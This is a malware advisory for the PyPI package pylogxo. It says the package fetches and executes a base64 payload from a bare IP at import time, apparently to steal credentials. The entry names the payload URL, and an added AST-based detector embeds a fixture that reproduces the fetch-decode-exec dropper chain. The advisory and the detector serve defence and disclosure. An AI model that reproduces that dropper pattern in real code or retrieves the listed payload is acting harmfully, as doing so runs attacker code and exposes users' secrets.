CRITICAL PyPI Malware

Malicious code in pylogxo (PyPI)

MAL-2026-5679

Published · Modified

Description



Source: amazon-inspector (bbeee018f429f5a978b85aa3999c8e24251a85dc787b1e4fd673abcabf157800)

On import pylogx, the package spawns a background thread that sleeps 5-20 seconds, force-installs sensitive third-party packages (cryptography, pycryptodomex, secretstorage, opencv-python, pillow, psutil) via pip, then fetches a base64-encoded blob from http://69.164.245.166/payload.txt over plaintext HTTP and passes the decoded bytes to exec() with a synthetic __name__ = "__payload__". The destination is a bare IP with no TLS, no pinning, and no signature verification, so any code the operator of that host serves runs in the importing process. The pre-installed dependency set (secretstorage + cryptography) is consistent with a follow-on credential / keyring harvester. The package is also distributed under the name pylogxo while installing the import name pylogx — a near-edit of legitimate logging library names — and ships placeholder metadata (empty README, https://github.com/example/pylogx, support@pylogx.example) and references submodules (formatter, handlers) that do not exist in the tarball, so the module will ImportError only after the dropper thread has already fired. There is no legitimate reason for a logging utility to fetch and execute remote code at import time.
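A static triage check for the import-time chain described above (background thread, pip install, plaintext fetch, base64 decode, exec of the result), as an added example that is not part of the advisory or of either source's tooling; the fixture modules are constructed and use a reserved test address, and the indicator names are this example's own:

```python
import ast

# Constructed fixture reproducing the described chain for detection testing;
# 203.0.113.7 is a reserved documentation address and the text is never run.
SUSPECT_SRC = '''
import base64, subprocess, sys, threading, time, urllib.request
def _stage():
    time.sleep(7)
    subprocess.check_call([sys.executable, "-m", "pip", "install", "secretstorage"])
    blob = urllib.request.urlopen("http://203.0.113.7/payload.txt").read()
    exec(base64.b64decode(blob), {"__name__": "__payload__"})
threading.Thread(target=_stage, daemon=True).start()
'''
BENIGN_SRC = '''
import logging
def get_logger(name):
    return logging.getLogger(name)
'''

def _callee(node):
    """Dotted name of a Call's target, e.g. 'urllib.request.urlopen'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))

def indicators(source):
    """Set of indicator tags present in a module's source text."""
    found = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith("http://"):
                found.add("plaintext_http_url")
        if not isinstance(node, ast.Call):
            continue
        name = _callee(node)
        # string literals inside list/tuple arguments, e.g. a pip command line
        list_args = [a.value for arg in node.args if isinstance(arg, (ast.List, ast.Tuple))
                     for a in arg.elts if isinstance(a, ast.Constant)]
        if name == "exec" and node.args and not isinstance(node.args[0], ast.Constant):
            found.add("exec_dynamic")       # exec() of data built at runtime
        elif name.endswith("b64decode"):
            found.add("base64_decode")
        elif name.endswith(("urlopen", "requests.get")):
            found.add("remote_fetch")
        elif name.startswith("subprocess.") and "pip" in list_args:
            found.add("pip_install")        # dependencies installed at import time
        elif name == "threading.Thread":
            found.add("background_thread")  # delayed, detached execution
    return found

def is_dropper(source):
    """The core chain alone (fetch, decode, dynamic exec) warrants manual review."""
    return {"remote_fetch", "base64_decode", "exec_dynamic"} <= indicators(source)
```

Run `indicators()` over each `.py` file in an unpacked sdist or wheel before installation; the extra tags (`pip_install`, `background_thread`, `plaintext_http_url`) raise confidence but the three-part chain is the trigger.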

Source: kam193 (7ccb3e3a1ccde821415d6be9c25d123cc1ebedea4ca6dd40d77fc24e01cd0aaa)

During import, the package downloads and executes remote code that is an infostealer.


Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-pylogxo

Reasons (based on the campaign):

  • Downloads and executes a remote malicious script.

  • infostealer

  • The package contains code to detect if it is running in a sandbox environment.

  • exfiltration-credentials

  • exfiltration-browser-data

  • files-exfiltration
